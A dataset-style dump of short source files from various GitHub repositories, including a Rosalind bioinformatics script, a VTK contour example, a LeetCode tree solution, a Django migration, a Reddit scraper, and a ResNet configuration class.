    links.append(link['href'])
template.metadata['links'] = links
# topic deliberately mirrors category (both from the primary category term)
template.metadata['category'] = result['metadata']['arxiv_primary_category']['term']
template.metadata['topic'] = result['metadata']['arxiv_primary_category']['term']
# Tags
tags = []
for tag in result['metadata']['tags']:
    tags.append(tag['term'])
template.metadata['tags'] = tags
template.metadata['pdf_url'] = result['metadata']['pdf_url']
template.metadata['arxiv_url'] = result['metadata']['arxiv_url']
# Equations
# Un-escape double backslashes left over from LaTeX extraction.
raw = [e.replace('\\\\','\\') for e in result['equations']]
# Let's count instead
equations = get_equation_counts(raw)
# Get total count to calculate percent
total = 0
for e,count in equations.items():
    total += count
# Let's make total width 900px
# Ensure is sorted
equation_list = []
# Ascending sort by count; each entry carries its share of the 900px bar.
for item in sorted(equations.items(), key=operator.itemgetter(1)):
    percent = item[1] / total
    pixels = round(percent * 900, 0)
    equation_list.append({'equation': item[0],
                          'count': item[1],
                          'pixels': pixels,
                          'percent': round(100*percent,2) })
# Greatest to least
equation_list.reverse()
template.metadata['equations'] = equation_list
template.metadata['equations_total'] = total
# Write to File
# NOTE(review): the directory name uses the raw month (no zero padding)
# while the filename zero-pads it -- confirm this mismatch is intended.
output_dir = os.path.abspath('%s/_posts/%s/%s' % (here, year, month))
if not os.path.exists(output_dir):
    os.makedirs(output_dir)
outfile = os.path.join(output_dir, '%s-%02d-%02d-%s.md' %(year, month, day, result['uid'].replace('/','-')))
with open(outfile, 'w') as filey:
    filey.writelines(frontmatter.dumps(template))
| [
"vsochat@stanford.edu"
] | vsochat@stanford.edu |
3148c6e92aa0af98497ad72eadb37962a9b50cd9 | 92065e3b378edc8e0570e4295aca0968de3c852d | /rosalind_frmt.py | c3178a9ffd4e87839daefb1e149757e2ceb3005d | [] | no_license | sunhuaiyu/rosalind | 18dc9fa78aaa84b478b112089a3b94d0f442b1bb | 7181cc9215d3ea0b5ad9d0811c00e01fd9f20b1c | refs/heads/master | 2020-04-04T17:53:17.437595 | 2019-04-11T17:03:52 | 2019-04-11T17:03:52 | 25,007,403 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # sun.huaiyu
# gbk
from Bio import Entrez, SeqIO
Entrez.email = 'hsun@salk.edu'
f = open('rosalind_frmt.txt')
ids = f.readline().split()
handle = Entrez.efetch(db='nucleotide', id=[', '.join(ids)], rettype='fasta')
records = list(SeqIO.parse(handle, 'fasta'))
shortest = sorted(records, key=lambda x: len(x.seq))[0]
f = open('rosalind_frmt_ans.txt', 'wt')
f.write(shortest.format('fasta'))
f.close()
| [
"noreply@github.com"
] | sunhuaiyu.noreply@github.com |
3ec6354d03c41e1a6cb36925667ad36dcc433e98 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_issue.py | 00ab7aacb2f25fe5d71d73b0fb32f899b9120904 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py |
#calss header
class _ISSUE():
def __init__(self,):
self.name = "ISSUE"
self.definitions = [u'a subject or problem that people are thinking and talking about: ', u'most important in what is being discussed: ', u'to make something seem more important than it should be, or to argue about it: ', u'to disagree strongly: ', u'to have difficulty or disagreement with someone or something: ', u'a set of newspapers or magazines published at the same time or a single copy of a newspaper or magazine: ', u'An issue of shares is a time when a company gives people the chance to buy part of it or gives extra shares to people who already own some.']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
4d48ca0b1e607e8bfce731a23c9d6dde8dd48770 | a680b681210a070ff6ac3eab4ed3ea5a125991d6 | /spider/instances/inst_fetch.py | 487fe1d57881e518171e2bb08fc2984b632fe21c | [
"BSD-2-Clause"
] | permissive | moonbirdxp/PSpider | bb6da1de6a78d86ee8704b6eb8981773a1a31d8c | 4d7238b4ebafd129ecc5dd1095ce1ece313945ec | refs/heads/master | 2020-06-22T03:46:17.320420 | 2019-07-16T03:26:20 | 2019-07-16T04:44:17 | 197,624,496 | 0 | 0 | BSD-2-Clause | 2019-10-15T01:04:19 | 2019-07-18T16:48:09 | Python | UTF-8 | Python | false | false | 1,711 | py | # _*_ coding: utf-8 _*_
"""
inst_fetch.py by xianhu
"""
import time
import random
class Fetcher(object):
"""
class of Fetcher, must include function working()
"""
def __init__(self, sleep_time=0, max_repeat=3):
"""
constructor
:param sleep_time: default 0, sleeping time after a fetching
:param max_repeat: default 3, maximum repeat count of a fetching
"""
self._sleep_time = sleep_time
self._max_repeat = max_repeat
return
def working(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
working function, must "try, except" and don't change the parameters and returns
:return fetch_state: can be -1(fetch failed), 0(need repeat), 1(fetch success)
:return content: can be any object, or exception information[class_name, excep]
:return proxies_state: can be -1(unavaiable), 0(return to queue), 1(avaiable)
"""
time.sleep(random.randint(0, self._sleep_time))
try:
fetch_state, content, proxies_state = self.url_fetch(priority, url, keys, deep, repeat, proxies=proxies)
except Exception as excep:
fetch_state, content, proxies_state = (-1 if repeat >= self._max_repeat else 0), [self.__class__.__name__, str(excep)], -1
return fetch_state, content, proxies_state
def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
fetch the content of a url, you must overwrite this function, parameters and returns refer to self.working()
"""
raise NotImplementedError
| [
"qixianhu@qq.com"
] | qixianhu@qq.com |
ba8e796d0931eec1c2ee5edeb7c0e03f0475c60a | 482b695d09d721d2d1731cf50e3928e058e44916 | /src/Python/StructuredPoints/Vol.py | bd3d72e56d26d82c9969ed3d20b53525bd0b1dff | [
"Apache-2.0"
] | permissive | numminorih/vtk-examples | b9d5c35f62dc287c6633b05ab4fb14033100bee8 | 2e3922a61cf4ef428c013d56d754742ff880b3cf | refs/heads/master | 2023-07-29T05:56:23.235478 | 2021-09-07T22:58:41 | 2021-09-07T22:58:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,639 | py | #!/usr/bin/env python
import vtk
def main():
colors = vtk.vtkNamedColors()
renderer = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(renderer)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
vol = vtk.vtkStructuredPoints()
vol.SetDimensions(26, 26, 26)
vol.SetOrigin(-0.5, -0.5, -0.5)
sp = 1.0 / 25.0
vol.SetSpacing(sp, sp, sp)
scalars = vtk.vtkDoubleArray()
scalars.SetNumberOfComponents(1)
scalars.SetNumberOfTuples(26 * 26 * 26)
for k in range(0, 26):
z = -0.5 + k * sp
kOffset = k * 26 * 26
for j in range(0, 26):
y = -0.5 + j * sp
jOffset = j * 26
for i in range(0, 26):
x = -0.5 + i * sp
s = x * x + y * y + z * z - (0.4 * 0.4)
offset = i + jOffset + kOffset
scalars.InsertTuple1(offset, s)
vol.GetPointData().SetScalars(scalars)
contour = vtk.vtkContourFilter()
contour.SetInputData(vol)
contour.SetValue(0, 0.0)
volMapper = vtk.vtkPolyDataMapper()
volMapper.SetInputConnection(contour.GetOutputPort())
volMapper.ScalarVisibilityOff()
volActor = vtk.vtkActor()
volActor.SetMapper(volMapper)
volActor.GetProperty().EdgeVisibilityOn()
volActor.GetProperty().SetColor(colors.GetColor3d('Salmon'))
renderer.AddActor(volActor)
renderer.SetBackground(colors.GetColor3d('SlateGray'))
renWin.SetSize(512, 512)
renWin.SetWindowName('Vol')
# Interact with the data.
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
| [
"andrew.amaclean@gmail.com"
] | andrew.amaclean@gmail.com |
373bef96a622b1cfeedf8d9879a96af87bfd9e46 | f8e8e365c9cf58b61d72655bc2340baeaed5baff | /Leetcode/Python Solutions/Binary Trees/UnivaluedBinaryTree.py | 3ed40370aac53df28bfef683b6d36e893ee4ed0e | [
"MIT"
] | permissive | Mostofa-Najmus-Sakib/Applied-Algorithm | 39a69f6b9ed113efe4a420d19cad79e0aa317637 | bc656fd655617407856e0ce45b68585fa81c5035 | refs/heads/master | 2023-08-31T19:54:34.242559 | 2021-11-05T03:43:35 | 2021-11-05T03:43:35 | 412,263,430 | 0 | 0 | MIT | 2021-09-30T23:45:29 | 2021-09-30T23:45:25 | null | UTF-8 | Python | false | false | 2,071 | py | """
LeetCode Problem:965. Univalued Binary Tree
Link: https://leetcode.com/problems/univalued-binary-tree/
Language: Python
Written by: Mostofa Adib Shakib
Two versions of the solution
Version 1(Recursive using DFS):
In this version of the solution we use a dfs helper method to compare every node in the true. If the value of every node is not equal to the
root node we return False. This method is faster as it doesn't iterative every node.
Version 2(Iteratively using In-Order traversal):
In this version of the solution we use a stack. We push all the left child of a node into the stack up until we reach a Null node.
If we reach a Null node and the stack is not empty then we pop an element from the stack and and compare it's value with the root node
if they are equal then we append it's right child to the stack or else we return False. This method is a bit slower as we are iterating over
all the left child of a node before comparing it's value with the root node.
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Version 1(Recursion using DFS)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def dfs(root,val):
if not root: return True
return root.val == val and dfs(root.left,val) and dfs(root.right,val)
return dfs(root,root.val)
# Version 2(Iteratively using In-Order traversal)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if not root: return True
curr = root
stack = []
while True:
if curr is not None:
stack.append(curr)
curr = curr.left
elif stack:
curr = stack.pop()
if root.val != curr.val:
return False
curr = curr.right
else:
break
return True | [
"adibshakib@gmail.com"
] | adibshakib@gmail.com |
7c2f2a6315e31fdfcbb25564c9f2140caa632aab | c72cde3c84b4c3ed1180f5e88a30780a90a70075 | /source/accounts/migrations/0004_auto_20191101_1520.py | 150d17738d1a16ee4602fb5d52c475c89c795da5 | [] | no_license | Aisuluu1405/python_group_3_homework_49_Aisulu_Dzhusupova | a88187e34a71c282eedd08c2616c66a19daef356 | 6fbf0a57dfc85ebd8203142f6b903228c67b1051 | refs/heads/master | 2022-11-28T18:32:32.732140 | 2019-12-09T14:11:01 | 2019-12-09T14:11:01 | 211,069,782 | 0 | 0 | null | 2022-11-22T04:47:28 | 2019-09-26T11:09:26 | Python | UTF-8 | Python | false | false | 590 | py | # Generated by Django 2.2 on 2019-11-01 15:20
from django.db import migrations
def create_user_profiles(apps, schema_editor):
User = apps.get_model('auth', 'User')
UserProfile = apps.get_model('accounts', 'UserProfile')
for user in User.objects.all():
UserProfile.objects.get_or_create(user=user)
def drop_user_profiles(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20191101_0536'),
]
operations = [
migrations.RunPython(create_user_profiles, drop_user_profiles)
]
| [
"aisuluueco2009@yandex.ru"
] | aisuluueco2009@yandex.ru |
94400f966a70ee4add2a8083778d5eb0fba7eaca | 05857cd30669a914d69ce872141964a4e6b31edd | /sample.py | 2cc30d2240966d3dfd725f69d94e80076a8fa628 | [] | no_license | EricSchles/test_naming | f61e0900835edbbd7f5054e1916e38647f460e9e | a9be0cc48c40b704c7970968458db3631c8116e2 | refs/heads/master | 2021-01-17T12:21:09.588993 | 2014-11-05T00:11:34 | 2014-11-05T00:11:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | class Foo:
def __init__(self,first,second):
self.first = first
self.second = second
def adder(self):
return self.first + self.second
def multipler(self):
return self.first * self.second
| [
"ericschles@gmail.com"
] | ericschles@gmail.com |
44dd986a455b97ff422c59570f460e119a19fc12 | 3496ead97ad993b8c32ff6f96cf3474110baef79 | /thisisproject/settings.py | d7c2755ccda782a22425d6f608116a620dfddfd3 | [] | no_license | vpgrishkin/django-channels-celery-jokes | 7e7d5b71110f14ef08c2e684ae89c39cd321b219 | b617cc97e8f9ad0710f6bd6de122749263b28c18 | refs/heads/master | 2020-03-31T08:48:01.011142 | 2018-06-17T06:16:32 | 2018-06-17T06:16:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,276 | py | import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "hzk=g8z3=*xds6zkaol*enq+^)b8_5knm6=gygewnc3yt3urg3"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"channels",
"jokes.apps.JokesConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "thisisproject.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "thisisproject.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = "/static/"
# Celery
CELERY_BROKER_URL = "redis://redis:6379/0"
CELERY_ACCEPT_CONTENT = ["json"]
CELERY_TASK_SERIALIZER = "json"
CELERY_RESULT_SERIALIZER = "json"
CELERY_BEAT_SCHEDULE = {
"get_random_joke": {"task": "jokes.tasks.get_random_joke", "schedule": 15.0}
}
# Channels
ASGI_APPLICATION = "thisisproject.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {"hosts": [("redis", 6379)]},
}
}
| [
"denis.orehovsky@gmail.com"
] | denis.orehovsky@gmail.com |
bebe9062b31f8a9800ce2d05f8bdc7ae7ac81e36 | 6ed034d0a5e239d7b0c528b287451409ffb4a494 | /mmpose/core/camera/__init__.py | a4a3c5526560996791a85f0d84a72a66286486ca | [
"Apache-2.0"
] | permissive | ViTAE-Transformer/ViTPose | 8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf | d5216452796c90c6bc29f5c5ec0bdba94366768a | refs/heads/main | 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 | Apache-2.0 | 2023-03-01T06:42:24 | 2022-04-27T01:09:19 | Python | UTF-8 | Python | false | false | 232 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .camera_base import CAMERAS
from .single_camera import SimpleCamera
from .single_camera_torch import SimpleCameraTorch
__all__ = ['CAMERAS', 'SimpleCamera', 'SimpleCameraTorch']
| [
"annblessus@gmail.com"
] | annblessus@gmail.com |
b13bca55632de5a3c7d5819f798989c93fc5fbe1 | 98cd5ddf45a73aea64bbfac0c0104829d7231b81 | /S - Grid Slide Square - Filled/info.py | 3a06687be68f63f5b6e0b36197f1252211343cde | [] | no_license | atheis4/ETC_Modes_Extra | 42508d523cfe632a3335e29f6e1e40af91df231b | d0ce221562105382a7a73cc6d280f4ad0eabf6f3 | refs/heads/master | 2022-04-04T11:15:07.335910 | 2020-01-03T20:27:32 | 2020-01-03T20:27:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | name = "S - Grid Slide Square - Filled"
description = "Grid of oscillating filled squares with LFO-controlled sliding rows with animated color fade"
knob1 = "Slide LFO speed"
knob2 = "Slide LFO range"
knob3 = "Size"
knob4 = "Color"
released = "March 18 2019"
| [
"media@critterandguitari.com"
] | media@critterandguitari.com |
7eada46e184e56ffe1faad35d8e3ba614acbbfa3 | bb31c0062354bbb0df70692e904c949a00973503 | /21_list_pop.py | 0426fabad056ce4b67e15136066a60f3c05bd401 | [] | no_license | millanmilu/Learn-Python-with-Milu- | c42df5aa7832fba75015b7af29d6009489e00ec5 | 3b4714b849dff0a0ef3cc91fd102840fbcf00e43 | refs/heads/master | 2022-04-26T03:29:38.990189 | 2020-04-28T13:17:28 | 2020-04-28T13:17:28 | 259,634,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | names = ['milu', 'Misan', 'millan', 'Babloo', 'anil']
print("It delete items from end of the list ")
names.pop()
print(names)
print("pop(0) returns the head (start), pop() or pop(-1) returns the tail(end)")
print(names.pop(0))
print(" LIFO -LAST IN ,FIRST OUT ;FIFO - FIRST IN ,FIRST OUT")
"""It’s computing jargon time! Don’t worry, these
won’t be on the final exam. If you use append() to
add new items to the end and pop() to remove
them from the same end, you’ve implemented a
data structure known as a LIFO (last in, first out)
queue. This is more commonly known as a stack.
pop(0) would create a FIFO (first in, first out)
queue. These are useful when you want to collect
data as they arrive and work with either the oldest
first (FIFO) or the newest first (LIFO).""" | [
"noreply@github.com"
] | millanmilu.noreply@github.com |
5d02854a055be280f4890d03f09c82e468df1e6f | f25d477be296a63aac156c8dd907397dc156024c | /vse/handlers/test.py | 421833f5a7e1c7a36c32d33ccd95e6f2e490ca40 | [] | no_license | cbaxter1988/validation_scripting_engine | f4e0a834632b5499c4d7a13b18d9208b27296325 | 86a8bd5061016f838747ea045bf3e32c0dd98e94 | refs/heads/master | 2022-11-23T05:23:05.343104 | 2020-07-22T06:55:47 | 2020-07-22T06:55:47 | 275,946,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | from vse.handlers import Handler, HandlerResult
class TestHandler(Handler):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def execute(self, **kwargs) -> HandlerResult:
poked = self.params.get("poked", False)
if poked:
self.result.status = True
self.result.msg = "Hey, You Poked Me"
else:
# print(self.params)
self.result.status = False
self.result.msg = "What do you want?"
self.check_expectation()
return self.result
| [
"cbaxtertech@gmail.com"
] | cbaxtertech@gmail.com |
2a6703236f533adc6ad37da1e13ce782b2c31505 | cc0da95420131620ab5d49c48b38d038f1b67833 | /scripts/update_reddit_cache.py | 2a4e92028b31bb97d2afa82e4882bff9491f28f0 | [
"MIT"
] | permissive | madeyoga/Nano-Bot | 4daee9a74351ca64329ec33ee7b565bba4cf3616 | 3966957d229aa2e3ea9945b2d9a96fb3353b910c | refs/heads/master | 2022-06-25T17:36:41.610957 | 2022-06-13T04:03:05 | 2022-06-13T04:03:05 | 140,231,221 | 13 | 10 | MIT | 2021-09-27T11:11:19 | 2018-07-09T04:28:35 | Python | UTF-8 | Python | false | false | 1,053 | py | import os
import praw
class Subreddits:
MEMES = "memes"
DANKMEMES = "dankmemes"
WTF = "wtf"
GRANDORDER = "grandorder"
WAIFU = "Waifu"
SCATHACH = "scathach"
FGOFANART = "FGOfanart"
ANIME = "anime"
ANIMEMES = "Animemes"
AWWNIME = "awwnime"
AZURELANE = "AzureLane"
TSUNDERES = "Tsunderes"
ANIMEWALLPAPER = "Animewallpaper" # ANIME WALLPAPER ARTS
MOESCAPE = "Moescape" # ANIME WALLPAPER ARTS
MAMARAIKOU = "MamaRaikou"
SABER = "Saber"
FGOCOMICS = "FGOcomics"
FATEPRISMAILLYA = "FatePrismaIllya"
ILLYASVIEL = "Illyasviel"
reddit = praw.Reddit(
client_id=os.environ['REDDIT_CLIENT_ID'],
client_secret=os.environ['REDDIT_CLIENT_SECRET'],
user_agent=os.environ['REDDIT_USER_AGENT']
)
submissions = list(reddit.subreddit(Subreddits.TSUNDERES).hot())
for submission in submissions:
# Post hint & url
print(submission.__dict__)
break
## print(submission.url,
## submission.is_self,
## submission.over_18,
## submission.stickied)
| [
"vngla21@gmail.com"
] | vngla21@gmail.com |
0c03f297ce168a7e9f0f9498333600c01a37b205 | 2c78b0b78f57dda018fe382a4ddda964eb3e68fd | /基础练习/jisuanji.py | f3732c06954f05def4711a8b00ef2dbfd787d19d | [] | no_license | Cola1995/s3 | 3a4621035928dcaa42c3117d25e88cf46a5f0721 | d5612d63dac415f861d379b20ba6a165faf213ae | refs/heads/master | 2020-04-13T14:14:38.753238 | 2019-03-22T01:36:46 | 2019-03-22T01:36:46 | 163,255,923 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,106 | py | import re
suan='1+(9+3*1-4+(1+4+(2+1*2+4/2)+(1+1))+(2*4))'
f=re.search('\([^()]*\)',suan).group()
print(f)
s='(2+1*2+1*3+3*3+9/3)'
s_t=''
if '*'or '/' in s:
for i in s:
if i=='*':
jie=int(s[s.index(i)-1])*int(s[s.index(i)+1])
s=s.replace(s[s.index(i)-1:s.index(i)+2],str(jie))
print(s)
elif i=='/':
jie1=int(s[s.index(i)-1])/int(s[s.index(i)+1])
s=s.replace(s[s.index(i)-1:s.index(i)+2],str(jie1))
print('体替换后的字符串是%s'%s)
else:
print("ssssss%s"%s)
index=s.count('+')+s.count('-')
for jj in range(index+1):
for i in s:
if i=='+':
sd=int(s[s.index(i)-1])+int(s[s.index(i)+1])
s=s.replace(s[s.index(i)-1:s.index(i)+2],str(sd))
print(s)
# else:
# for i in s_t:
# if i== '+':
# int_jg=int(s_t[s_t.index(i)-1])+int(s_t[s_t.index(i)+1])
# t_jia=s_t.replace(s_t[s_t.index(i)-1:s_t.index(i)+2],str(int_jg))
# print(t_jia)
| [
"991571566@qq.com"
] | 991571566@qq.com |
40f03b4a47d7607f7ead87b54fbca5de90f106d2 | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/study/others_program.py | eaf139b4920f4137f30074773b3a1a6c7017c4b9 | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | const request = require('request');
const uuidv4 = require('uuid/v4');
/* Checks to see if the subscription key is available
as an environment variable. If you are setting your subscription key as a
string, then comment these lines out.
If you want to set your subscription key as a string, replace the value for
the Ocp-Apim-Subscription-Key header as a string. */
const subscriptionKey="9115e0519101697df35c8c7256d54256";
if (!subscriptionKey) {
throw new Error('Environment variable for your subscription key is not set.')
};
/* If you encounter any issues with the base_url or path, make sure that you are
using the latest endpoint: https://docs.microsoft.com/azure/cognitive-services/translator/reference/v3-0-translate */
function translateText(){
let options = {
method: 'POST',
baseUrl: 'https://api.cognitive.microsofttranslator.com/',
url: 'translate',
qs: {
'api-version': '3.0',
'to': ['']
},
headers: {
'38d63b3a15b77fa7883f764dd1732eae': subscriptionKey,
'Content-type': 'application/json',
'X-ClientTraceId': uuidv4().toString()
},
body: [{
'text': 'Hello World!'
}],
json: true,
};
request(options, function(err, res, body){
console.log(JSON.stringify(body, null, 4));
});
};
// Call the function to translate text.
translateText();
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
19338b9bbddbf1b84311569fecdfa9bf70ae8287 | d5552cda58e251e6a5983876681be8f641dea86f | /src/transformers/models/resnet/configuration_resnet.py | 2d0dbc3b0fdb409f4150d985484321766f1fcd44 | [
"Apache-2.0"
] | permissive | patrickvonplaten/transformers | feb121e1ee82c317ac7561836b8f95a7de25fc1f | f738502979f6787609dcf0180e6606f464692e27 | refs/heads/master | 2022-12-08T10:15:34.743198 | 2022-11-22T11:00:20 | 2022-11-22T11:00:20 | 226,201,271 | 6 | 1 | Apache-2.0 | 2019-12-05T22:39:46 | 2019-12-05T22:39:45 | null | UTF-8 | Python | false | false | 5,262 | py | # coding=utf-8
# Copyright 2022 Microsoft Research, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" ResNet model configuration"""
from collections import OrderedDict
from typing import Mapping
from packaging import version
from ...configuration_utils import PretrainedConfig
from ...onnx import OnnxConfig
from ...utils import logging
logger = logging.get_logger(__name__)
RESNET_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"microsoft/resnet-50": "https://huggingface.co/microsoft/resnet-50/blob/main/config.json",
}
class ResNetConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`ResNetModel`]. It is used to instantiate an
ResNet model according to the specified arguments, defining the model architecture. Instantiating a configuration
with the defaults will yield a similar configuration to that of the ResNet
[microsoft/resnet-50](https://huggingface.co/microsoft/resnet-50) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
embedding_size (`int`, *optional*, defaults to 64):
Dimensionality (hidden size) for the embedding layer.
hidden_sizes (`List[int]`, *optional*, defaults to `[256, 512, 1024, 2048]`):
Dimensionality (hidden size) at each stage.
depths (`List[int]`, *optional*, defaults to `[3, 4, 6, 3]`):
Depth (number of layers) for each stage.
layer_type (`str`, *optional*, defaults to `"bottleneck"`):
The layer to use, it can be either `"basic"` (used for smaller models, like resnet-18 or resnet-34) or
`"bottleneck"` (used for larger models like resnet-50 and above).
hidden_act (`str`, *optional*, defaults to `"relu"`):
The non-linear activation function in each block. If string, `"gelu"`, `"relu"`, `"selu"` and `"gelu_new"`
are supported.
downsample_in_first_stage (`bool`, *optional*, defaults to `False`):
If `True`, the first stage will downsample the inputs using a `stride` of 2.
out_features (`List[str]`, *optional*):
If used as backbone, list of features to output. Can be any of `"stem"`, `"stage1"`, `"stage2"`,
`"stage3"`, `"stage4"`.
Example:
```python
>>> from transformers import ResNetConfig, ResNetModel
>>> # Initializing a ResNet resnet-50 style configuration
>>> configuration = ResNetConfig()
>>> # Initializing a model (with random weights) from the resnet-50 style configuration
>>> model = ResNetModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```
"""
model_type = "resnet"
layer_types = ["basic", "bottleneck"]
def __init__(
self,
num_channels=3,
embedding_size=64,
hidden_sizes=[256, 512, 1024, 2048],
depths=[3, 4, 6, 3],
layer_type="bottleneck",
hidden_act="relu",
downsample_in_first_stage=False,
out_features=None,
**kwargs
):
super().__init__(**kwargs)
if layer_type not in self.layer_types:
raise ValueError(f"layer_type={layer_type} is not one of {','.join(self.layer_types)}")
self.num_channels = num_channels
self.embedding_size = embedding_size
self.hidden_sizes = hidden_sizes
self.depths = depths
self.layer_type = layer_type
self.hidden_act = hidden_act
self.downsample_in_first_stage = downsample_in_first_stage
self.stage_names = ["stem"] + [f"stage{idx}" for idx in range(1, len(depths) + 1)]
if out_features is not None:
if not isinstance(out_features, list):
raise ValueError("out_features should be a list")
for feature in out_features:
if feature not in self.stage_names:
raise ValueError(
f"Feature {feature} is not a valid feature name. Valid names are {self.stage_names}"
)
self.out_features = out_features
class ResNetOnnxConfig(OnnxConfig):
torch_onnx_minimum_version = version.parse("1.11")
@property
def inputs(self) -> Mapping[str, Mapping[int, str]]:
return OrderedDict(
[
("pixel_values", {0: "batch", 1: "num_channels", 2: "height", 3: "width"}),
]
)
@property
def atol_for_validation(self) -> float:
return 1e-3
| [
"noreply@github.com"
] | patrickvonplaten.noreply@github.com |
d64428aa8ab4edc892e4df136959e62393a5edc2 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/datashare/v20201001preview/get_blob_data_set.py | 79ae160c76b7217e3429731faca4a1ab166ad90b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 7,209 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
